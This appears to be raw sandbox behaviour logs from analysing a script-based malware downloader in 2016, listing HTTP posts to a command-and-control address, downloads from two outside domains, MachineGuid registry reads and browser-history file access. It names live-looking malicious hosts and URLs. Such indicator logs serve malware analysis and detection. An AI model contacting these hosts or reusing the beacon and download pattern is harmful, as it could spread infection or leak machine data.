process: None
signs: [{u'type': u'http', u'value': {u'count': 1, u'body': u'', u'uri': u'http://85.17.19.102/upload/_dispatch.php', u'user-agent': u'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)', u'port': 80, u'host': u'85.17.19.102', u'version': u'1.1', u'path': u'/upload/_dispatch.php', u'data': u'POST /upload/_dispatch.php HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-us\r\nReferer: http://85.17.19.102/upload/\r\nx-requested-with: XMLHttpRequest\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip, deflate\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)\r\nHost: 85.17.19.102\r\nContent-Length: 875\r\nConnection: Keep-Alive\r\n\r\n', u'method': u'POST'}}, {u'type': u'http', u'value': {u'count': 1, u'body': u'', u'uri': u'http://85.17.19.102/upload/_dispatch.php', u'user-agent': u'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)', u'port': 80, u'host': u'85.17.19.102', u'version': u'1.1', u'path': u'/upload/_dispatch.php', u'data': u'POST /upload/_dispatch.php HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-us\r\nReferer: http://85.17.19.102/upload/\r\nx-requested-with: XMLHttpRequest\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip, deflate\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)\r\nHost: 85.17.19.102\r\nContent-Length: 913\r\nConnection: Keep-Alive\r\n\r\n', u'method': u'POST'}}, {u'type': u'http', u'value': {u'count': 1, u'body': u'', u'uri': u'http://85.17.19.102/upload/_dispatch.php', u'user-agent': u'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)', u'port': 80, u'host': u'85.17.19.102', u'version': u'1.1', u'path': u'/upload/_dispatch.php', u'data': u'POST /upload/_dispatch.php HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-us\r\nReferer: http://85.17.19.102/upload/\r\nx-requested-with: XMLHttpRequest\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip, deflate\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)\r\nHost: 85.17.19.102\r\nContent-Length: 1145\r\nConnection: Keep-Alive\r\n\r\n', u'method': u'POST'}}, {u'type': u'http', u'value': {u'count': 1, u'body': u'', u'uri': u'http://akcord.com/R4yjhg', u'user-agent': u'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)', u'port': 80, u'host': u'akcord.com', u'version': u'1.1', u'path': u'/R4yjhg', u'data': u'GET /R4yjhg HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)\r\nHost: akcord.com\r\nConnection: Keep-Alive\r\n\r\n', u'method': u'GET'}}, {u'type': u'http', u'value': {u'count': 1, u'body': u'', u'uri': u'http://85.17.19.102/upload/_dispatch.php', u'user-agent': u'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)', u'port': 80, u'host': u'85.17.19.102', u'version': u'1.1', u'path': u'/upload/_dispatch.php', u'data': u'POST /upload/_dispatch.php HTTP/1.1\r\nAccept: */*\r\nAccept-Language: en-us\r\nReferer: http://85.17.19.102/upload/\r\nx-requested-with: XMLHttpRequest\r\nContent-Type: application/x-www-form-urlencoded\r\nAccept-Encoding: gzip, deflate\r\nCache-Control: no-cache\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)\r\nHost: 85.17.19.102\r\nContent-Length: 666\r\nConnection: Keep-Alive\r\n\r\n', u'method': u'POST'}}, {u'type': u'http', u'value': {u'count': 1, u'body': u'', u'uri': u'http://sanariumspb.ru/Xm9xul', u'user-agent': u'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)', u'port': 80, u'host': u'sanariumspb.ru', u'version': u'1.1', u'path': u'/Xm9xul', u'data': u'GET /Xm9xul HTTP/1.1\r\nAccept: */*\r\nAccept-Encoding: gzip, deflate\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)\r\nHost: sanariumspb.ru\r\nConnection: Keep-Alive\r\n\r\n', u'method': u'GET'}}]
process: {u'process_name': u'wscript.exe', u'process_id': 644}
signs: [{u'type': u'api', u'value': {u'category': u'filesystem', u'status': True, u'return': u'0x00000000', u'timestamp': u'2016-05-30 19:29:46,984', u'thread_id': u'1676', u'repeated': 0, u'api': u'NtCreateFile', u'arguments': [{u'name': u'ShareAccess', u'value': u'3'}, {u'name': u'FileName', u'value': u'C:\\Documents and Settings\\User\\Local Settings\\History\\History.IE5\\index.dat'}, {u'name': u'DesiredAccess', u'value': u'0xc0100080'}, {u'name': u'CreateDisposition', u'value': u'3'}, {u'name': u'FileHandle', u'value': u'0x00000244'}], u'id': 1284}}]
process: {u'process_name': u'wscript.exe', u'process_id': 644}
signs: [{u'type': u'api', u'value': {u'category': u'filesystem', u'status': True, u'return': u'0x00000000', u'timestamp': u'2016-05-30 19:29:46,984', u'thread_id': u'1676', u'repeated': 0, u'api': u'NtCreateFile', u'arguments': [{u'name': u'ShareAccess', u'value': u'3'}, {u'name': u'FileName', u'value': u'C:\\Documents and Settings\\User\\Local Settings\\History\\History.IE5\\index.dat'}, {u'name': u'DesiredAccess', u'value': u'0xc0100080'}, {u'name': u'CreateDisposition', u'value': u'3'}, {u'name': u'FileHandle', u'value': u'0x00000244'}], u'id': 1287}}]
process: {u'process_name': u'jnPfzxT_79946.exe', u'process_id': 360}
signs: [{u'type': u'api', u'value': {u'category': u'filesystem', u'status': True, u'return': u'0x00000000', u'timestamp': u'2016-05-30 19:30:19,531', u'thread_id': u'592', u'repeated': 0, u'api': u'NtCreateFile', u'arguments': [{u'name': u'ShareAccess', u'value': u'3'}, {u'name': u'FileName', u'value': u'C:\\Documents and Settings\\User\\Local Settings\\History\\History.IE5\\index.dat'}, {u'name': u'DesiredAccess', u'value': u'0xc0100080'}, {u'name': u'CreateDisposition', u'value': u'3'}, {u'name': u'FileHandle', u'value': u'0x00000168'}], u'id': 666}}]
process: {u'process_name': u'jnPfzxT_79946.exe', u'process_id': 360}
signs: [{u'type': u'api', u'value': {u'category': u'filesystem', u'status': True, u'return': u'0x00000000', u'timestamp': u'2016-05-30 19:30:19,531', u'thread_id': u'592', u'repeated': 0, u'api': u'NtCreateFile', u'arguments': [{u'name': u'ShareAccess', u'value': u'3'}, {u'name': u'FileName', u'value': u'C:\\Documents and Settings\\User\\Local Settings\\History\\History.IE5\\index.dat'}, {u'name': u'DesiredAccess', u'value': u'0xc0100080'}, {u'name': u'CreateDisposition', u'value': u'3'}, {u'name': u'FileHandle', u'value': u'0x00000168'}], u'id': 669}}]
process: {u'process_name': u'WScript.exe', u'process_id': 772}
signs: [{u'type': u'api', u'value': {u'category': u'registry', u'status': True, u'return': u'0x00000000', u'timestamp': u'2016-05-30 19:29:46,483', u'thread_id': u'1696', u'repeated': 0, u'api': u'RegQueryValueExA', u'arguments': [{u'name': u'Handle', u'value': u'0x000001bc'}, {u'name': u'DataLength', u'value': u'37'}, {u'name': u'ValueName', u'value': u'MachineGuid'}, {u'name': u'Type', u'value': u'1'}], u'id': 499}}]
process: {u'process_name': u'WScript.exe', u'process_id': 772}
signs: [{u'type': u'api', u'value': {u'category': u'registry', u'status': True, u'return': u'0x00000000', u'timestamp': u'2016-05-30 19:29:46,483', u'thread_id': u'1696', u'repeated': 0, u'api': u'RegQueryValueExA', u'arguments': [{u'name': u'Handle', u'value': u'0x000001bc'}, {u'name': u'Data', u'value': u'e97bd94f-e805-4c92-9982-42f7c80101bf\\x00'}, {u'name': u'ValueName', u'value': u'MachineGuid'}], u'id': 500}}]
process: {u'process_name': u'wscript.exe', u'process_id': 644}
signs: [{u'type': u'api', u'value': {u'category': u'registry', u'status': True, u'return': u'0x00000000', u'timestamp': u'2016-05-30 19:29:46,934', u'thread_id': u'1676', u'repeated': 0, u'api': u'RegQueryValueExA', u'arguments': [{u'name': u'Handle', u'value': u'0x000001bc'}, {u'name': u'DataLength', u'value': u'37'}, {u'name': u'ValueName', u'value': u'MachineGuid'}, {u'name': u'Type', u'value': u'1'}], u'id': 509}}]
process: {u'process_name': u'wscript.exe', u'process_id': 644}
signs: [{u'type': u'api', u'value': {u'category': u'registry', u'status': True, u'return': u'0x00000000', u'timestamp': u'2016-05-30 19:29:46,934', u'thread_id': u'1676', u'repeated': 0, u'api': u'RegQueryValueExA', u'arguments': [{u'name': u'Handle', u'value': u'0x000001bc'}, {u'name': u'Data', u'value': u'e97bd94f-e805-4c92-9982-42f7c80101bf\\x00'}, {u'name': u'ValueName', u'value': u'MachineGuid'}], u'id': 510}}]
process: {u'process_name': u'jnPfzxT_79946.exe', u'process_id': 360}
signs: [{u'type': u'api', u'value': {u'category': u'registry', u'status': True, u'return': u'0x00000000', u'timestamp': u'2016-05-30 19:29:49,507', u'thread_id': u'592', u'repeated': 0, u'api': u'RegQueryValueExA', u'arguments': [{u'name': u'Handle', u'value': u'0x00000144'}, {u'name': u'DataLength', u'value': u'37'}, {u'name': u'ValueName', u'value': u'MachineGuid'}, {u'name': u'Type', u'value': u'1'}], u'id': 426}}]
process: {u'process_name': u'jnPfzxT_79946.exe', u'process_id': 360}
signs: [{u'type': u'api', u'value': {u'category': u'registry', u'status': True, u'return': u'0x00000000', u'timestamp': u'2016-05-30 19:29:49,507', u'thread_id': u'592', u'repeated': 0, u'api': u'RegQueryValueExA', u'arguments': [{u'name': u'Handle', u'value': u'0x00000144'}, {u'name': u'Data', u'value': u'e97bd94f-e805-4c92-9982-42f7c80101bf\\x00'}, {u'name': u'ValueName', u'value': u'MachineGuid'}], u'id': 427}}]
process: {u'process_name': u'jnPfzxT_79946.exe', u'process_id': 360}
signs: [{u'type': u'api', u'value': {u'category': u'registry', u'status': True, u'return': u'0x00000000', u'timestamp': u'2016-05-30 19:30:19,511', u'thread_id': u'592', u'repeated': 0, u'api': u'RegQueryValueExA', u'arguments': [{u'name': u'Handle', u'value': u'0x00000144'}, {u'name': u'DataLength', u'value': u'37'}, {u'name': u'ValueName', u'value': u'MachineGuid'}, {u'name': u'Type', u'value': u'1'}], u'id': 485}}]
process: {u'process_name': u'jnPfzxT_79946.exe', u'process_id': 360}
signs: [{u'type': u'api', u'value': {u'category': u'registry', u'status': True, u'return': u'0x00000000', u'timestamp': u'2016-05-30 19:30:19,511', u'thread_id': u'592', u'repeated': 0, u'api': u'RegQueryValueExA', u'arguments': [{u'name': u'Handle', u'value': u'0x00000144'}, {u'name': u'Data', u'value': u'e97bd94f-e805-4c92-9982-42f7c80101bf\\x00'}, {u'name': u'ValueName', u'value': u'MachineGuid'}], u'id': 486}}]
process: {u'process_name': u'jnPfzxT_79946.exe', u'process_id': 360}
signs: [{u'type': u'api', u'value': {u'category': u'registry', u'status': True, u'return': u'0x00000000', u'timestamp': u'2016-05-30 19:30:29,104', u'thread_id': u'1788', u'repeated': 0, u'api': u'RegQueryValueExA', u'arguments': [{u'name': u'Handle', u'value': u'0x00000208'}, {u'name': u'DataLength', u'value': u'37'}, {u'name': u'ValueName', u'value': u'MachineGuid'}, {u'name': u'Type', u'value': u'1'}], u'id': 6739}}]
process: {u'process_name': u'jnPfzxT_79946.exe', u'process_id': 360}
signs: [{u'type': u'api', u'value': {u'category': u'registry', u'status': True, u'return': u'0x00000000', u'timestamp': u'2016-05-30 19:30:29,104', u'thread_id': u'1788', u'repeated': 0, u'api': u'RegQueryValueExA', u'arguments': [{u'name': u'Handle', u'value': u'0x00000208'}, {u'name': u'Data', u'value': u'e97bd94f-e805-4c92-9982-42f7c80101bf\\x00'}, {u'name': u'ValueName', u'value': u'MachineGuid'}], u'id': 6740}}]